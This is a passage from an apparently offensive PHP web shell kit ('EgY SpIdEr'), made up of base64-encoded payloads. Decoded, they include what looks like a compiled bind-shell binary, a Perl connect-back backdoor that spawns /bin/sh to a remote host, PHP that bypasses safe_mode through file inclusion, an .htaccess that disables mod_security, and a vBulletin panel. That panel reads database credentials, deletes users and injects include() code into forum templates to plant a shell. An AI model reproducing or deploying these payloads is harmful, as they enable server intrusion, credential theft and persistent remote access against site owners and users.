DkAAAAG4YECAAAAAACAAwAhAAAAAAAAAAAAAAABADx//AAAACwmQQIAAAAAAEAEAD9AAAAuJkECAAAAAABABEACgEAAKiJBAgAAAAAAQAPABgBAAC8mQQIAAAAAAEAEgAkAQAA+IgECAAAAAACAAwALwAAAAAAAAAAAAAABADx/zoBAAAAAAAAAAAAAAQA8f90AQAAAAAAAAAAAAAEAPH/eAEAAMCZBAgAAAAAAQITAIEBAACsmQQIAAAAAAAC8f+SAQAArJkECAAAAAAAAvH/pQEAAKyZBAgAAAAAAALx/7YBAACMmgQIAAAAAAECFQDMAQAArJkECAAAAAAAAvH/3wEAAAAAAAB1AQAAEgAAAPABAAAAAAAAcQAAABIAAAABAgAARIkECAQAAAARAA4ACAIAAAAAAADMAAAAEgAAABoCAAAAAAAAWgAAABIAAAAqAgAA2JoECAAAAAARAhYANwIAAK2IBAhKAAAAEgAMAEcCAAAAAAAAeAAAABIAAABZAgAAiIQECAAAAAASAAoAXwIAAAAAAAA5AAAAEgAAAHECAAAAAAAAOQAAABIAAACHAgAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A"; +$back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0="; +$egy_ini="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+"; +$egy_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$egy_vb="DQo8aHRtbD48aGVhZD48dGl0bGU+RWdZIFNwSWRFciA8L3RpdGxlPg0KPFNUWUxFPg0KDQpCT0RZDQogew0KICAgICAgICBTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNIQURPVy1DT0xPUjogIzAwMDAwMDsgQ09MT1I6ICM2NjY2NjY7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjNzI2NDU2OyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICM3MjY0NTY7IFNDUk9MTEJBUi1UUkFDSy1DT0xPUjogIzI5MjkyOTsgRk9OVC1GQU1JTFk6IFZlcmRhbmE7IFNDUk9MTEJBUi1EQVJLU0hBRE9XLUNPTE9SOiAjNzI2NDU2DQp9DQoNCnRyIHsNCkJPUkRFUi1SSUdIVDogICNkYWRhZGEgOw0KQk9SREVSLVRPUDogICAgI2RhZGFkYSA7DQpCT1JERVItTEVGVDogICAjZGFkYWRhIDsNCkJPUkRFUi1CT1RUT006ICNkYWRhZGEgOw0KY29sb3I6ICNmZmZmZmY7DQp9DQp0ZCB7DQpCT1JERVItUklHSFQ6ICAjZGFkYWRhIDsNCkJPUkRFUi1UT1A6ICAgICNkYWRhZGEgOw0KQk9SREVSLUxFRlQ6ICAgI2RhZGFkYSA7DQpCT1JERVItQk9UVE9NOiAjZGFkYWRhIDsNCmNvbG9yOiAjZGFkYWRhOw0KfQ0KLnRhYmxlMSB7DQpCT1JERVI6IDE7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMDAwMDAwOw0KY29sb3I6ICMzMzMzMzM7DQp9DQoudGQxIHsNCkJPUkRFUjogMTsNCmZvbnQ6IDdwdCB0YWhvbWE7DQpjb2xvcjogI2ZmZmZmZjsNCn0NCi50cjEgew0KQk9SREVSOiAxOw0KY29sb3I6ICNkYWRhZGE7DQp9DQp0YWJsZSB7DQpCT1JERVI6ICAjZWVlZWVlICBvdXRzZXQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMDAwMDAwOw0KY29sb3I6ICNkYWRhZGE7DQp9DQppbnB1dCB7DQpCT1JERVItUklHSFQ6ICAjMDBGRjAwIDEgc29saWQ7DQpCT1JERVItVE9QOiAgICAjMDBGRjAwIDEgc29saWQ7DQpCT1JERVItTEVGVDogICMwMEZGMDAgMSBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMwMEZGMDAgMSBzb2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMzMzMzMzM7DQpmb250OiA5cHQgdGFob21hOw0KY29sb3I6ICNmZmZmZmY7DQp9DQpzZWxlY3Qgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxIHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxIHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzAwMDAwMDsNCmZvbnQ6IDlwdCB0YWhvbWE7DQpjb2xvcjogI2RhZGFkYTs7DQp9DQpzdWJtaXQgew0KQk9SREVSOiAgYnV0dG9uaGlnaGxpZ2h0IDEgb3V0c2V0Ow0KQkFDS0dST1VORC1DT0xPUjogIzI3MjcyNzsNCndpZHRoOiA0MCU7DQpjb2xvcjogI2RhZGFkYTsNCn0NCnRleHRhcmVhIHsNCkJPUkRFUi1SSUdIVDogICNmZmZmZmYgMSBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICM5OTk5OTkgMSBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICM5OTk5OTkgMSBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICNmZmZmZmYgMSBzb2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMzMzMzMzM7DQpmb250OiBGaXhlZHN5cyBib2xkOw0KY29sb3I6ICNmZmZmZmY7DQp9DQpCT0RZIHsNCm1hcmdpbjogMTsNCmNvbG9yOiAjZGFkYWRhOw0KYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCn0NCkE6bGluayB7Q09MT1I6cmVkOyBURVhULURFQ09SQVRJT046IG5vbmV9DQpBOnZpc2l0ZWQgeyBDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6YWN0aXZlIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6aG92ZXIge2NvbG9yOmJsdWU7VEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KDQo8L1NUWUxFPg0KPC9oZWFkPg0KIDxib2R5IGJnY29sb3I9IiMwMDAwMDAiIHRleHQ9ImxpbWUiIGxpbms9ImxpbWUiIHZsaW5rPSJsaW1lIj4NCiA8Y2VudGVyPg0KPD8NCiRhY3QgPSAkX0dFVFsnYWN0J107DQppZigkYWN0PT0ncmVjb25maWcnICYmIGlzc2V0KCRfUE9TVFsncGF0aCddKSkNCnsNCiRwYXRoID0gJF9QT1NUWydwYXRoJ107DQppbmNsdWRlICRwYXRoOw0KPz4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj48dGg+Ojo6OlJlYWQgQ29uZmlnIERhdGE6Ojo6PC90aD48dGg+PD8gZWNobyAnPGZvbnQgY29sb3I9eWVsbG93PicgLiAkcGF0aCAuICc8L2ZvbnQ+JzsgPz48L3RoPg0KPHRyPg0KPHRoPkhvc3QgOiA8L3RoPjx0aD48PyBlY2hvICc8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRjb25maWdbJ01hc3RlclNlcnZlciddWydzZXJ2ZXJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+VXNlciA6IDwvdGg+PHRoPjw/IGVjaG8gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3VzZXJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+UGFzcyA6IDwvdGg+PHRoPjw/DQokcGFzc3NxbCA9ICRjb25maWdbJ01hc3RlclNlcnZlciddWydwYXNzd29yZCddOw0KaWYgKCRwYXNzc3FsID09ICcnKQ0Kew0KJHJlc3VsdCA9ICc8Zm9udCBjb2xvcj1yZWQ+Tm8gUGFzc3dvcmQ8L2ZvbnQ+JzsNCn0gZWxzZSB7DQokcmVzdWx0ID0gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJHBhc3NzcWwgLiAnPC9mb250Pic7DQp9DQplY2hvICRyZXN1bHQ7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+TmFtZSA6IDwvdGg+PHRoPjw/IGVjaG8gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJGNvbmZpZ1snRGF0YWJhc2UnXVsnZGJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8L3RhYmxlPg0KPD8NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09ImRlbCIgICYmIGlzc2V0KCRfUE9TVFsndmJ1c2VyJ10pICkNCnsNCiAkaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmJ1c2VyID0gJF9QT1NUWyd2YnVzZXInXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRxdWVyeSA9ICdkZWxldGUgKiBmcm9tIHVzZXIgd2hlcmUgdXNlcm5hbWU9IicgLiAkdmJ1c2VyIC4gJyI7JzsNCiRyID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcikNCnsNCmVjaG8gJzxmb250IGNvbG9yPXllbGxvdz5Vc2VyIDogJyAuICR2YnVzZXIgLiAnIHdhcyBkZWxldGVkPC9mb250Pic7DQp9IGVsc2Ugew0KZWNobyAnPGZvbnQgY29sb3I9cmVkPlVzZXIgOiAnIC4gJHZidXNlciAuICcgY291bGQgbm90IGJlIGRlbGV0ZWQ8L2ZvbnQ+JzsNCn0NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09InNoZWxsIiAgJiYgaXNzZXQoJF9QT1NUWyd2YXInXSkpDQp7DQokaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmFyID0gJF9QT1NUWyd2YXInXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRXZHQgPSAnVVBEQVRFIGB0ZW1wbGF0ZWAgU0VUIGB0ZW1wbGF0ZWAgPSBcJyAiLnByaW50IGluY2x1ZGUoJEhUVFBfR0VUX1ZBUlNbJyAuICR2YXIgLiAnXSkuIiBcJ1dIRVJFIGB0aXRsZWAgPVwnRk9SVU1IT01FXCc7JzsNCiRXZHQyPSAnVVBEQVRFIGBzdHlsZWAgU0VUIGBjc3NgID0gXCcgIi5wcmludCBpbmNsdWRlKCRIVFRQX0dFVF9WQVJTWycgLiAkdmFyIC4gJ10pLiIgXCcsIGBzdHlsZXZhcnNgID0gXCdcJywgYGNzc2NvbG9yc2AgPSBcJ1wnLCBgZWRpdG9yc3R5bGVzYCA9IFwnXCcgOyc7DQokcmVzdWx0PW15c3FsX3F1ZXJ5KCRXZHQpOw0KICBpZiAoJHJlc3VsdCkge2VjaG8gIjxwPkRvbmUgRXhwbG9pdC48L3A+PGJyPlVzZSB0aGlzIDogPGJyPiBpbmRleC5waHA/IiAuICR2YXIgLiAiPXNoZWxsLnR4dCI7fWVsc2V7DQplY2hvICI8cD5FcnJvcjwvcD4iO30NCiRyZXN1bHQxPW15c3FsX3F1ZXJ5KCRXZHQyKTsNCiAgaWYgKCRyZXN1bHQxKSB7IGVjaG8gIjxwPkRvbmUgQ3JlYXRlIEZpbGU8L3A+PGJyPlVzZSB0aGlzIDogPGJyPiBpbmRleC5waHA/IiAuICR2YXIgLiAiPXNoZWxsLnR4dCI7fSBlbHNleyBlY2hvICI8cD5FcnJvcjwvcD4iO30NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09ImNvZGUiICAmJiBpc3NldCgkX1BPU1RbJ2NvZGUnXSkpDQp7DQokaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokaW5kZXggPSAkX1BPU1RbJ2NvZGUnXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRpbmRleCA9ICRfUE9TVFsnYiddOw0KJFdkdCA9ICdVUERBVEUgYHRlbXBsYXRlYCBTRVQgYHRlbXBsYXRlYCA9IFwnICcgLiAkaW5kZXggLiAnICBcJ1dIRVJFIGB0aXRsZWAgPVwnRk9SVU1IT01FXCc7JzsNCiRXZHQyPSAnVVBEQVRFIGBzdHlsZWAgU0VUIGBjc3NgID0gXCcgJyAuICRpbmRleCAuICcgXCcsIGBzdHlsZXZhcnNgID0gXCdcJywgYGNzc2NvbG9yc2AgPSBcJ1wnLCBgZWRpdG9yc3R5bGVzYCA9IFwnXCcgOyc7DQokcmVzdWx0PW15c3FsX3F1ZXJ5KCRXZHQpOw0KICBpZiAoJHJlc3VsdCkge2VjaG8gIjxwPkluZGV4IHdhcyBDaGFuZ2VkIFN1Y2NlZnVsbHk8L3A+Ijt9ZWxzZXsNCmVjaG8gIjxwPkZhaWxlZCB0byBjaGFuZ2UgaW5kZXg8L3A+Ijt9DQokcmVzdWx0MT1teXNxbF9xdWVyeSgkV2R0Mik7DQppZiAoJHJlc3VsdDEpIHtlY2hvICI8cD5Eb25lIENyZWF0ZSBGaWxlPC9wPiI7fSBlbHNleyBlY2hvICI8cD5FcnJvcjwvcD4iO30NCn0NCg0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0iaW5jIiAgJiYgaXNzZXQoJF9QT1NUWydsaW5rJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KJHZibGluayA9ICRfUE9TVFsnbGluayddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJGhhY2sxNSA9ICdVUERBVEUgYHRlbXBsYXRlYCBTRVQgYHRlbXBsYXRlYCA9IFwnJHNwYWNlcl9vcGVuDQp7JHtpbmNsdWRlKFwnXCcnIC4gJHZibGluayAuICdcJ1wnKX19eyR7ZXhpdCgpfX0mDQokX3BocGluY2x1ZGVfb3V0cHV0XCdXSEVSRSBgdGl0bGVgID1cJ0ZPUlVNSE9NRVwnOyc7DQokaGFjaz0gJ1VQREFURSBgc3R5bGVgIFNFVCBgY3NzYCA9IFwnJHNwYWNlcl9vcGVuDQp7JHtpbmNsdWRlKFwnXCcnIC4gJHZibGluayAuJ1wnXCcpfX17JHtleGl0KCl9fSYNCiRfcGhwaW5jbHVkZV9vdXRwdXRcJywgYHN0eWxldmFyc2AgPSBcJ1wnLCBgY3NzY29sb3JzYCA9IFwnXCcsIGBlZGl0b3JzdHlsZXNgID0gXCdcJyA7JzsNCiRyZXN1bHQ9bXlzcWxfcXVlcnkoJGhhY2sxNSkgb3IgZGllKG15c3FsX2Vycm9yKCkpOw0KJHJlc3VsdD1teXNxbF9xdWVyeSgkaGFjaykgb3IgZGllKG15c3FsX2Vycm9yKCkpOw0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0ibWFpbCIgICYmIGlzc2V0KCRfUE9TVFsndmJ1c2VyJ10pICAmJiBpc3NldCgkX1BPU1RbJ3ZibWFpbCddKSkNCnsNCiAkaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107